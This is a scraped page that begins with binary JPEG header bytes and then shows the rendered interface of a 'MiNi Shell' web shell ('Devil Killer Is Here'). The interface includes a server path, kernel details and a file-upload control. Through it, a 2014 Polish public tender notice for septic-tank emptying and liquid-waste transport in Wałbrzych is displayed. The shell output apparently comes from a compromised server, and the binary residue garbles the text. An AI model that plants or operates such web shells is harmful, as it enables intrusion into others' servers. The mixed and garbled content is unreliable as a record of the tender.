JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140509/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140509/157456-N-2014.html

<p class="kh_header"><b>Wałbrzych: Usługi opróżniania i czyszczenia zbiorników bezodpływowych oraz transportu nieczystości ciekłych</b><br>
<b>Numer ogłoszenia: 157456 - 2014; data zamieszczenia: 09.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Sp. z o.o. w Wałbrzychu , ul. Generała Andersa 48, 58-304 Wałbrzych, woj. dolnośląskie, tel. 074 8870505, faks 074 8477477.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzbwalbrzych.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi opróżniania i czyszczenia zbiorników bezodpływowych oraz transportu nieczystości ciekłych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Przedmiotem zamówienia są: Zadanie 1 Usługi wywozu nieczystości ciekłych z szamb (dołów gnilnych) wyszczególnionych w załączniku nr 1 do SIWZ, obejmujące następujące czynności: 1. dojazd do szamb (dołów gnilnych) określonych w załączniku nr 1 do SIWZ w celu ich opróżnienia, 2. opróżnianie szamb (dołów gnilnych) z całej ich zawartości na każde zgłoszenie Zamawiającego w przypadku wystąpienia takiej potrzeby. Przystąpienie do opróżnienia szamb (dołów gnilnych) winno nastąpić w ciągu 12 godzin, od otrzymania informacji od Zamawiającego, z zastrzeżeniem że w przypadku otrzymania informacji po godz. 10:00 przystąpienie do opróżnienia szamba (dołu gnilnego) powinno nastąpić nie później niż do godz. 8:00 dnia następnego. Zgłoszenie winno nastąpić w formie pisemnej lub za pomocą poczty elektronicznej. Do przekazywania informacji o potrzebie wykonania usługi uprawnieni są Kierownicy lub upoważnieni pracownicy Biur Obsługi Klienta lub Pogotowia Technicznego Zamawiającego, 3. transport nieczystości ciekłych do stacji zlewnej w sposób niepowodujący zanieczyszczenia środowiska poprzez przedostawanie się nieczystości ciekłych na zewnątrz, 4. zrzut nieczystości ciekłych do stacji zlewnej, 5. utrzymanie właściwego standardu sanitarnego pojazdu (pojazdów) samochodowego przystosowanego do odbierania nieczystości ciekłych poprzez wykonywanie następujących zabiegów sanitarnych i porządkowych: a) pojazd (pojazdy) do odbierania nieczystości ciekłych należy utrzymywać systematycznie w czystości, a co najmniej jeden raz w miesiącu zapewnić mycie, odkażanie i dezynfekcję pojazdu (pojazdów), wewnątrz i na zewnątrz, 6. zgłaszanie Zamawiającemu stwierdzonych usterek szamb (dołów gnilnych). Zadanie 2 Usługi czyszczenia szamb (dołów gnilnych) wyszczególnionych w załączniku nr 1 do SIWZ 1. dojazd do szamb (dołów gnilnych) określonych w załączniku nr 1 do umowy, 2. czyszczenie szamb (dołów gnilnych) ze śmieci, różnego rodzaju przedmiotów, kożucha, zawiesiny, osadów, gruzu itp. w przypadku zaistnienia takiej potrzeby i w tym zakresie Wykonawca jest wytwórcą odpadów w rozumieniu ustawy z dnia 14 grudnia 2012 r. o odpadach i odpowiada za dalszy sposób gospodarowania odpadami powstałymi w wyniku czyszczenia szamb, 3. transport nieczystości wybranych z szamb (dołów gnilnych) do miejsc ich unieszkodliwienia, 4. przystąpienie do czyszczenia szamb (dołów gnilnych) winno nastąpić w ciągu 12 godzin od otrzymania zgłoszenia, z zastrzeżeniem że w przypadku otrzymania zgłoszenia po godz. 10:00 przystąpienie do czyszczenia szamba (dołu gnilnego) powinno nastąpić nie później niż do godz. 8:00 dnia następnego. Zgłoszenie winno  nastąpić w formie pisemnej lub za pomocą poczty elektronicznej. Do przekazywania informacji o potrzebie wykonania usługi uprawnieni są Kierownicy lub upoważnieni pracownicy Biur Obsługi Klienta lub Pogotowia Technicznego Zamawiającego. Zadanie 3 Usługi wypompowywania nieczystości ciekłych (m.in. fekalii, wód gruntowych lub opadowych) 1. wypompowywanie nieczystości ciekłych, z zalanych piwnic, korytarzy i innych pomieszczeń oraz ze studzienek w przypadku zaistnienia takiej potrzeby. Przystąpienie do wypompowania nieczystości ciekłych i wód winno nastąpić w ciągu 6 godzin od otrzymania informacji od Zamawiającego w formie pisemnej lub za pomocą poczty elektronicznej. Do przekazywania informacji o potrzebie wykonania usługi uprawnieni są Kierownicy lub upoważnieni pracownicy Biur Obsługi Klienta lub Pogotowia Technicznego Zamawiającego. 2. usługi będą świadczone w budynkach (terenach - w przypadku studzienek) usytuowanych na terenie Wałbrzycha i zarządzanych przez MZB sp. z o.o. 3. transport nieczystości ciekłych do stacji zlewnej w sposób niepowodujący zanieczyszczenia środowiska poprzez przedostawanie się nieczystości ciekłych na zewnątrz, 4. zrzut nieczystości ciekłych do stacji zlewnej. 2) Wykaz stanowiący załącznik nr 1 do SIWZ określający lokalizację szamb (dołów gnilnych) ich pojemność, średnią roczną ilość nieczystości ciekłych odebranych z szamb (dołów gnilnych), po zaktualizowaniu na dzień zawarcia umowy i usunięciu danych dotyczących średniej rocznej ilości nieczystości ciekłych odebranych z szamb (dołów gnilnych), będzie stanowił załącznik nr 1 do umowy, która zostanie zawarta z Wykonawcą na zadania 1 i 2. 3) Liczba szamb (dołów gnilnych) objętych niniejszym zamówieniem może w okresie realizacji umowy odbiegać od stanu określonego w w/w załącznikach..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówienia uzupełniającego. Zgodnie z art. 67 ustawy Pzp w sytuacji gdy zajdzie konieczność powtórzenia tego samego rodzaju zamówienia, opisanego w pkt. 6 SIWZ na nieruchomościach zarządzanych przez Zamawiającego. Zamówienie uzupełniające może być udzielone dotychczasowemu wykonawcy usług w wysokości nie więcej niż 50 % wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7, 90.41.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawców wniesienia wadium, w wysokości: Zadanie nr 1: 1.420,00 zł, Zadanie nr 2: 290,00 zł, Zadanie nr 3: 200,00 zł. Wadium należy wnieść w terminie do 27 maja 2014 r. do godz. 10:00.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie wykonawca jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Należyte wykonanie co najmniej 1 usługi o charakterze i złożoności porównywalnej z przedmiotem zamówienia opisanym dla zadania nr 1. Warunek zostanie spełniony jeżeli Wykonawca wykaże się doświadczeniem zawodowym polegającym na tym, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał/wykonuje co najmniej 1 usługę w ramach jednego kontraktu polegającą na opróżnieniu co najmniej 3 zbiorników bezodpływowych dla budynków wielolokalowych - w przypadku złożenia oferty na zadanie 1 2. Należyte wykonanie co najmniej 1 usługi o charakterze i złożoności porównywalnej z przedmiotem zamówienia opisanym dla zadania nr 2. Warunek zostanie spełniony jeżeli Wykonawca wykaże się doświadczeniem zawodowym polegającym na tym, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał/wykonuje co najmniej 1 usługę polegającą na czyszczeniu zbiornika bezodpływowego - w przypadku złożenia oferty na zadanie 2. 3. Należyte wykonanie co najmniej 1 usługi o charakterze i złożoności porównywalnej z przedmiotem zamówienia opisanym dla zadania nr 3. Warunek zostanie spełniony jeżeli Wykonawca wykaże się doświadczeniem zawodowym polegającym na tym, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał/wykonuje co najmniej 1 usługę w ramach jednego kontraktu polegającą na wypompowywaniu nieczystości ciekłych (m.in. fekalii, wód gruntowych, wód opadowych) z co najmniej 3 budynków wielolokalowych - w przypadku złożenia oferty na zadanie 3.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie do realizacji zamówienia nie mniej niż jednym pojazdem przystosowanym do opróżniania szamb (dołów gnilnych) z nieczystości ciekłych i transportowania ich do stacji zlewnej w sposób niepowodujący zanieczyszczenia środowiska poprzez przedostawanie się nieczystości ciekłych na zewnątrz. Pojazd przystosowany do odbierania nieczystości ciekłych winien spełniać wymagania określone w Rozporządzeniu Ministra Infrastruktury z dnia 12 listopada 2002 r. w sprawie wymagań dla pojazdów asenizacyjnych oraz Uchwale nr XL/347/2012 Rady Miejskiej Wałbrzycha z dnia 29 listopada 2012 r. w sprawie wymagań, jakie powinni spełniać przedsiębiorcy ubiegający się o uzyskanie zezwolenia w zakresie opróżniania zbiorników bezodpływowych i transportu nieczystości ciekłych - w przypadku złożenia oferty na zadanie 1 lub/i 2 lub/i 3</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie co najmniej 2 osobami, które będą uczestniczyć w wykonywaniu zamówienia i posiadają staż pracy przy wykonywaniu takich prac jak przedmiot zamówienia co najmniej 1 rok - w przypadku złożenia oferty na zadanie 1 lub/i 2 lub/i 3</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności, zgodnej z przedmiotem zamówienia, na kwotę nie mniejszą niż 50.000 zł (dla każdego zadania odrębnie)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony przez Wykonawcę formularz oferty (formularz A stanowiący załącznik do SIWZ) wraz z załącznikami. 2. Oświadczenie o spełnieniu warunków udziału w postępowaniu. 3. Dowód wniesienia wadium. 4. Stosowne pełnomocnictwa</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Na podstawie art. 144 ust. 1 ustawy każda ze stron może żądać wprowadzenia zmian w umowie w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, jeśli wystąpi co najmniej jedna z niżej wymienionych okoliczności: 1) Wystąpi urzędowa zmiany stawki podatku VAT. Należny podatek VAT naliczony zostanie do ceny netto wskazanej w ofercie wg stawki zgodnej z obowiązującym prawem w dniu wystawienia faktury, co nie dotyczy przypadków objęcia Wykonawcy, który w dniu podpisania umowy nie był płatnikiem VAT, obowiązkiem podatkowym w zakresie tego podatku. 2) Wynagrodzenie za wykonywane usługi, może ulec zmianie za zgodą stron, w przypadku gdy jest ona korzystna dla  Zamawiającego. 3) Wystąpi konieczność zmiany osób będących przedstawicielami Zamawiającego z przyczyn niezależnych od niego. 4) Zaistnieje niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie z niniejszą SIWZ. 5) Zajdzie potrzeba przedłużenia terminu realizacji umowy na okres nie dłuższy niż 12 miesięcy. O zmianie terminu obowiązywania umowy wykonawca zostanie powiadomiony przez zamawiającego co najmniej 2 tygodnie przed upływem terminu na który została zawarta umowa. 6) Zajdzie potrzeba  w sytuacji zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego. Zmiana wymaga zgłoszenia w formie pisemnej. Zmiana ta nie spowoduje zmiany wynagrodzenia wykonawcy. Inicjatorem tej zmiany może być Zamawiający lub Wykonawca. 7) Dopuszcza się zmniejszenie lub zwiększenie przedmiotu umowy w części dotyczącej załącznika nr 1 do niniejszej umowy, gdy wynika to z potrzeb Zamawiającego. Zmiana ta wymaga jedynie poinformowania Wykonawcy drogą elektroniczną. 8) Nastąpi zmiana osób odpowiedzialnych ze strony Wykonawcy za wykonanie przedmiotu umowy, pod warunkiem wyrażenia zgody przez Zamawiającego. 9) W trakcie realizacji zamówienia zostanie ujawniony błąd (np. w szczegółowym opisie przedmiotu zamówienia). 10) Wystąpi konieczność zmiany podwykonawcy, powierzenia wykonania części zakresu umowy podwykonawcy lub zmiany zakresu wykonania części zamówienia przez podwykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzbwalbrzych.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Budynków sp. z o.o. w Wałbrzychu ul. Generała Andersa 48 (pok. nr 15) 58-304 Wałbrzych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2014 godzina 10:00, miejsce: Miejski Zarząd Budynków sp. z o.o. w Wałbrzychu ul. Generała Andersa 48 (pok. nr 10) 58-304 Wałbrzych.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługi wywozu nieczystości ciekłych z szamb (dołów gnilnych).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1 Usługi wywozu nieczystości ciekłych z szamb (dołów gnilnych) wyszczególnionych w załączniku nr 1 do SIWZ, obejmujące następujące czynności: 1. dojazd do szamb (dołów gnilnych) określonych w załączniku nr 1 do SIWZ w celu ich opróżnienia, 2. opróżnianie szamb (dołów gnilnych) z całej ich zawartości na każde zgłoszenie Zamawiającego w przypadku wystąpienia takiej potrzeby. Przystąpienie do opróżnienia szamb (dołów gnilnych) winno nastąpić w ciągu 12 godzin, od otrzymania informacji od Zamawiającego, z zastrzeżeniem że w przypadku otrzymania informacji po godz. 10:00 przystąpienie do opróżnienia szamba (dołu gnilnego) powinno nastąpić nie później niż do godz. 8:00 dnia następnego. Zgłoszenie winno nastąpić w formie pisemnej lub za pomocą poczty elektronicznej. Do przekazywania informacji o potrzebie wykonania usługi uprawnieni są Kierownicy lub upoważnieni pracownicy Biur Obsługi Klienta lub Pogotowia Technicznego Zamawiającego, 3. transport nieczystości ciekłych do stacji zlewnej w sposób niepowodujący zanieczyszczenia środowiska poprzez przedostawanie się nieczystości ciekłych na zewnątrz, 4. zrzut nieczystości ciekłych do stacji zlewnej, 5. utrzymanie właściwego standardu sanitarnego pojazdu (pojazdów) samochodowego przystosowanego do odbierania nieczystości ciekłych poprzez wykonywanie następujących zabiegów sanitarnych i porządkowych: a) pojazd (pojazdy) do odbierania nieczystości ciekłych należy utrzymywać systematycznie w czystości, a co najmniej jeden raz w miesiącu zapewnić mycie, odkażanie i dezynfekcję pojazdu (pojazdów), wewnątrz i na zewnątrz, 6. zgłaszanie Zamawiającemu stwierdzonych usterek szamb (dołów gnilnych)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7, 90.41.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługi czyszczenia szamb (dołów gnilnych).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 2 Usługi czyszczenia szamb (dołów gnilnych) wyszczególnionych w załączniku nr 1 do SIWZ 1. dojazd do szamb (dołów gnilnych) określonych w załączniku nr 1 do umowy, 2. czyszczenie szamb (dołów gnilnych) ze śmieci, różnego rodzaju przedmiotów, kożucha, zawiesiny, osadów, gruzu itp. w przypadku zaistnienia takiej potrzeby i w tym zakresie Wykonawca jest wytwórcą odpadów w rozumieniu ustawy z dnia 14 grudnia 2012 r. o odpadach i odpowiada za dalszy sposób gospodarowania odpadami powstałymi w wyniku czyszczenia szamb, 3. transport nieczystości wybranych z szamb (dołów gnilnych) do miejsc ich unieszkodliwienia, 4. przystąpienie do czyszczenia szamb (dołów gnilnych) winno nastąpić w ciągu 12 godzin od otrzymania zgłoszenia, z zastrzeżeniem że w przypadku otrzymania zgłoszenia po godz. 10:00 przystąpienie do czyszczenia szamba (dołu gnilnego) powinno nastąpić nie później niż do godz. 8:00 dnia następnego. Zgłoszenie winno  nastąpić w formie pisemnej lub za pomocą poczty elektronicznej. Do przekazywania informacji o potrzebie wykonania usługi uprawnieni są Kierownicy lub upoważnieni pracownicy Biur Obsługi Klienta lub Pogotowia Technicznego Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7, 90.41.00.00-4.</p></li>
